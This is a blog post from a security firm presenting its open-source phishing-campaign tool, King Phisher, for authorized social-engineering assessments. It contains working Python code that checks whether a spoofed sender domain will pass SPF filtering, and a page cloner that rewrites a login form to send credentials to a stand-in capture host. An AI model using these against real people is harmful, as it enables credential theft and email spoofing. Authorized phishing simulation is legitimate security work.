SecureState Blog


SecureState’s King Phisher Program

At SecureState, we often stress to our clients that Social Engineering is one of the most common methods attackers use to gain access. Social Engineering attacks take many forms, from callers trying to talk staff out of credentials over the phone to people trying to convince security guards to let them into a facility. The most common are email phishing campaigns, which themselves take a few different forms: the email can carry a malicious attachment that gives the attacker access to the user's system, or it can try to convince the user to visit a website that harvests credentials or delivers malware, granting similar access.


While simulating a phone attack or an outsider attempting to gain physical access can be difficult, simulating these email-based attacks is feasible for many companies, and provides valuable data on the organization's security awareness and on the training that needs to take place. To help run these types of campaigns, SecureState has released King Phisher, our open source email phishing campaign program. It has been developed by SecureState's security experts, drawing on the numerous Social Engineering assessments we have performed for our clients over the years.

King Phisher Features

King Phisher gives companies the ability to set up email-based phishing campaigns, with messages tailored to the exact specifications of the company being tested. Messages can contain any number of campaign-specific fields, and images can be embedded in the email itself rather than loaded from an external site, so they display even when the recipient's mail client blocks remote content. Messages are created as templates, which can be reused for retesting and altered as needed.

King Phisher also includes support for the Sender Policy Framework (SPF). SPF lets a domain publish in DNS which mail servers are allowed to send mail on its behalf; a receiving mail server compares the IP address of the connecting server against the record for the domain in the sender address, and rejects or flags as spam messages that fail. Because a phishing campaign usually spoofs a sender address, King Phisher can check the SPF record of the sender domain you intend to use before the campaign is sent, so you know in advance whether the messages would fail that check and be filtered, and can adjust the sender domain or relay accordingly. While these checks do stop many phishing attacks from getting through, sophisticated attackers know how to work around them, so your assessments need to do the same.
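
To show what such a pre-flight SPF check actually answers, here is an added example (written for this post, not King Phisher's own code) that evaluates an SPF record for a sending IP address. The DNS data is a constructed in-memory table so the script runs offline; the domains example.com, mailhost.example, legacy.example and spoofable.example and the relay address 10.0.0.1 are assumptions, not real infrastructure. It implements the common mechanisms (ip4, ip6, a, mx, include, all) and the redirect modifier; real evaluators also handle exists, ptr, CIDR suffixes on a/mx, and macros.

```python
import ipaddress

# Constructed DNS records standing in for real lookups so the example runs offline.
FAKE_DNS = {
    ("example.com", "TXT"): ["v=spf1 ip4:192.0.2.0/24 mx include:_spf.mailhost.example -all"],
    ("example.com", "MX"): ["mail.example.com"],
    ("mail.example.com", "A"): ["198.51.100.25"],
    ("_spf.mailhost.example", "TXT"): ["v=spf1 ip4:203.0.113.0/24 ~all"],
    ("legacy.example", "TXT"): ["v=spf1 redirect=example.com"],
    ("spoofable.example", "TXT"): ["v=spf1 +all"],  # permissive record: spoofing passes
}

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
MAX_LOOKUPS = 10  # RFC 7208 limit on DNS-querying terms per evaluation


def lookup(name, rtype):
    return FAKE_DNS.get((name.lower(), rtype), [])


def spf_record(domain):
    for txt in lookup(domain, "TXT"):
        if txt.lower().startswith("v=spf1"):
            return txt
    return None


def check_host(ip, domain, _lookups=None):
    """SPF result for mail from `domain` delivered by the host at `ip`:
    pass, fail, softfail, neutral, none (no record) or permerror."""
    _lookups = [0] if _lookups is None else _lookups
    record = spf_record(domain)
    if record is None:
        return "none"
    addr = ipaddress.ip_address(ip)
    redirect = None
    for term in record.split()[1:]:
        if "=" in term:  # modifier, e.g. redirect= or exp=
            mod, _, target = term.partition("=")
            if mod.lower() == "redirect":
                redirect = target
            continue
        qual = "+"
        if term[0] in QUALIFIERS:
            qual, term = term[0], term[1:]
        mech, _, arg = term.partition(":")
        mech = mech.lower()
        if mech == "all":
            return QUALIFIERS[qual]
        if mech in ("ip4", "ip6"):
            # A v4 address is never inside a v6 network (and vice versa); no error raised.
            matched = addr in ipaddress.ip_network(arg, strict=False)
        else:
            _lookups[0] += 1
            if _lookups[0] > MAX_LOOKUPS:
                return "permerror"
            if mech == "a":
                matched = str(addr) in lookup(arg or domain, "A")
            elif mech == "mx":
                matched = any(str(addr) in lookup(mx, "A") for mx in lookup(arg or domain, "MX"))
            elif mech == "include":
                matched = check_host(ip, arg, _lookups) == "pass"
            else:
                return "permerror"  # exists, ptr, CIDR suffixes and macros not implemented here
        if matched:
            return QUALIFIERS[qual]
    if redirect:  # redirect only applies once every mechanism has failed to match
        _lookups[0] += 1
        return check_host(ip, redirect, _lookups)
    return "neutral"  # record exhausted with no match and no "all"


def assess_sender(sender_address, relay_ip):
    """What an operator wants before launching: how will a receiver's SPF check
    treat a message that spoofs sender_address but is delivered from relay_ip?"""
    domain = sender_address.rpartition("@")[2]
    result = check_host(relay_ip, domain)
    verdict = {
        "fail": "rejected by strict receivers: pick a different sender domain or relay",
        "softfail": "likely flagged as spam",
        "none": "no SPF record, spoof not blocked by SPF",
    }.get(result, "not blocked by SPF")
    return result, verdict


if __name__ == "__main__":
    for sender in ("it-support@example.com", "it-support@spoofable.example"):
        print(sender, assess_sender(sender, "10.0.0.1"))
```

Run against the constructed table, a spoof of example.com from the relay at 10.0.0.1 comes back "fail" because the record ends in -all and none of ip4, mx or include match, while spoofable.example's "+all" passes anything. That is exactly the distinction an assessor needs before sending: a "fail" means the spoof will be rejected outright by receivers that enforce SPF, and the campaign should use a different sender domain or a relay the domain authorizes.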

Recently, SecureState added the ability to clone web pages, which can be used to create highly accurate copies of real websites for use in a phishing campaign. One of the more common techniques in phishing attacks is a legitimate-looking website that delivers malware or gets an unsuspecting user to enter credentials. King Phisher includes tools your company can use to build such a site by cloning the legitimate one.
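
A cloned page needs two changes to work as a lure: asset references must still resolve once the copy is served from the phishing host, and the login form must submit to the assessor's capture endpoint instead of the real site. The following added example (written for this post, not King Phisher's cloning code) does both with only the standard library. The sample page, the base URL www.example.com and the capture URL phish.example/capture are constructed for the demonstration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urljoin


class PageCloner(HTMLParser):
    """Re-emit a page with href/src/action URLs made absolute against the
    original site, and every <form> pointed at the capture endpoint."""

    URL_ATTRS = {"href", "src", "action"}

    def __init__(self, base_url, capture_url):
        # Keep entity references as written so they are re-emitted unchanged.
        super().__init__(convert_charrefs=False)
        self.base_url = base_url
        self.capture_url = capture_url
        self.out = []

    def _rewrite(self, tag, attrs):
        rewritten = []
        for name, value in attrs:
            if value is not None and name in self.URL_ATTRS:
                if tag == "form" and name == "action":
                    value = self.capture_url          # credentials come to us
                else:
                    value = urljoin(self.base_url, value)  # assets still load from the real site
            rewritten.append((name, value))
        return rewritten

    def _emit_tag(self, tag, attrs, selfclosing=False):
        parts = [tag]
        for name, value in self._rewrite(tag, attrs):
            # Attribute values arrive unescaped from the parser; escape them again on output.
            parts.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        self.out.append("<" + " ".join(parts) + (" />" if selfclosing else ">"))

    def handle_starttag(self, tag, attrs):
        # A <form> without an action posts back to the page itself; give it one explicitly.
        if tag == "form" and not any(name == "action" for name, _ in attrs):
            attrs = list(attrs) + [("action", self.capture_url)]
        self._emit_tag(tag, attrs)

    def handle_startendtag(self, tag, attrs):
        self._emit_tag(tag, attrs, selfclosing=True)

    def handle_endtag(self, tag):
        self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(data)  # also covers raw <script> and <style> bodies

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_comment(self, data):
        self.out.append(f"<!--{data}-->")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")


def clone_page(html, base_url, capture_url):
    """Return the rewritten HTML of a page fetched from base_url."""
    cloner = PageCloner(base_url, capture_url)
    cloner.feed(html)
    cloner.close()
    return "".join(cloner.out)


# Constructed stand-in for a fetched login page.
SAMPLE_PAGE = """<!DOCTYPE html>
<html><head><title>Example Portal</title>
<link rel="stylesheet" href="/static/site.css">
</head><body>
<img src="img/logo.png" alt="Logo &amp; tagline">
<form method="post" action="/login">
<input name="user"><input type="password" name="pass">
<button>Sign in</button>
</form>
<a href="https://other.example/help">Help</a>
</body></html>
"""

if __name__ == "__main__":
    print(clone_page(SAMPLE_PAGE, "https://www.example.com/portal/index.html",
                     "https://phish.example/capture"))
```

The relative stylesheet and logo paths become absolute links back to www.example.com, the absolute help link is left alone, and the form now posts to phish.example/capture. Only href, src and action are rewritten; a real clone also needs to handle srcset, url() references inside CSS, and URLs assembled by JavaScript, which is why page-cloning tools fetch and rewrite those resources as well.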

King Phisher Reporting

All of these tools are great for running a campaign, but the results of a campaign need to be understood and analyzed to be turned into actionable steps for an organization to take. King Phisher has a wide variety of reporting capabilities to provide organizations with the kinds of actionable data they need.

Reports and charts can be generated showing the number of visits to the cloned website, including unique visitors and repeat visits. The most recent version of King Phisher added the capability to map where visitors are connecting from. While this may be less useful for a smaller organization based in one location, for companies with offices spread across the country or the world this information can provide valuable guidance on where to focus training efforts.



King Phisher is still in development, and new features are added on a regular basis. For the full story, as well as the complete technical details of the program, check out the War Room blog, where SecureState's experts go into depth on the improvements they add and explore any technical issues in using King Phisher. The suite itself can be found on SecureState's GitHub page, where it can be downloaded. To see how King Phisher works in action, take a look at our webinar on Advanced Phishing Techniques.